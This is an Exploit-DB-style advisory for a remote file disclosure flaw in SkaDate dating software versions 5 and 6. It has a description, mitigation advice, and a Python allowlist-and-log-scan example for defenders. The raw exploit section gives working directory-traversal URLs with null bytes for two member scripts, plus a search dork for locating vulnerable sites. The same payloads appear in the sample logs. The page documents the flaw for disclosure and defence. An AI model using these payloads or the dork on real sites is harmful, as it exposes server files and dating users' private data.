vendor: SkaDate Online Dating Software
by: SnIpEr-SA.CoM
CVSS: 5.5 MEDIUM
Remote File Disclosure
CWE: 98
Product Name: SkaDate Online Dating Software
Affected Version From: 5
Affected Version To: 6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SkaDate Online Dating Software Remote File Disclosure Vulnerability

The vulnerability allows an attacker to disclose files on the target system by exploiting a file inclusion vulnerability in the SkaDate Online Dating Software. By manipulating the 'view_mode' parameter in the 'featured_list.php' and 'online_list.php' files, an attacker can traverse the file system and access sensitive files.

Mitigation:

The vendor should release a patch or update to fix the file inclusion vulnerability. In the meantime, users should restrict access to the affected files and implement proper input validation to prevent directory traversal attacks.
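One way to apply the input-validation advice above, as an added example that is not part of the original advisory or of SkaDate's code: an allowlist check for `view_mode`, run here over constructed access-log lines to flag requests to the two affected scripts that would fail it. The token pattern, the `gallery` value, the log format and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# The two scripts named in the advisory.
AFFECTED = ("/member/featured_list.php", "/member/online_list.php")
# Assumption: legitimate view_mode values are short plain tokens.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Request target inside a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Normalise before validating: undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_safe_view_mode(raw):
    """Allowlist check: accept only a plain token, reject everything else."""
    return SAFE_VALUE.fullmatch(fully_decode(raw)) is not None

def suspicious_requests(log_lines):
    """Return (line number, decoded view_mode) for requests that fail the check."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.endswith(AFFECTED):
            continue
        # Split the query by hand so the value is still in its raw, encoded form.
        for pair in url.query.split("&"):
            key, _, raw = pair.partition("=")
            if key == "view_mode" and not is_safe_view_mode(raw):
                hits.append((number, fully_decode(raw)))
    return hits

# Constructed sample lines (documentation IP ranges, made-up sizes and values).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Oct/2007:10:00:01 +0000] "GET /member/featured_list.php?view_mode=gallery HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Oct/2007:10:00:09 +0000] "GET /member/online_list.php?view_mode=../../../../file%00 HTTP/1.1" 200 312',
    '198.51.100.7 - - [06/Oct/2007:10:00:12 +0000] "GET /member/featured_list.php?view_mode=%2E%2E%2F%2E%2E%2Ffile HTTP/1.1" 200 298',
    '192.0.2.10 - - [06/Oct/2007:10:00:20 +0000] "GET /index.php?view_mode=../x HTTP/1.1" 404 0',
]
if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: view_mode={value!r}")
```

The same `is_safe_view_mode` rule is what the application itself would need to enforce before the parameter reaches any file path; the log scan only shows which past requests would have been rejected.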
Source

Exploit-DB raw data:

# SkaDate Online Dating Software Remote File Disclosure Vulnerability
# Author : SnIpEr-SA.CoM
# tested version : 5.0 & 6.0
# Homepage : http://www.skadate.com
# Price: 795.00
# Exp :
# http://www.site.com/member/featured_list.php?view_mode=../../../../file%00
#
# http://www.site.com/member/online_list.php?view_mode=../../../../file%00


# Open Source Code, [o.0]

# dork : Powered by SkaDate Dating 

# milw0rm.com [2007-10-06]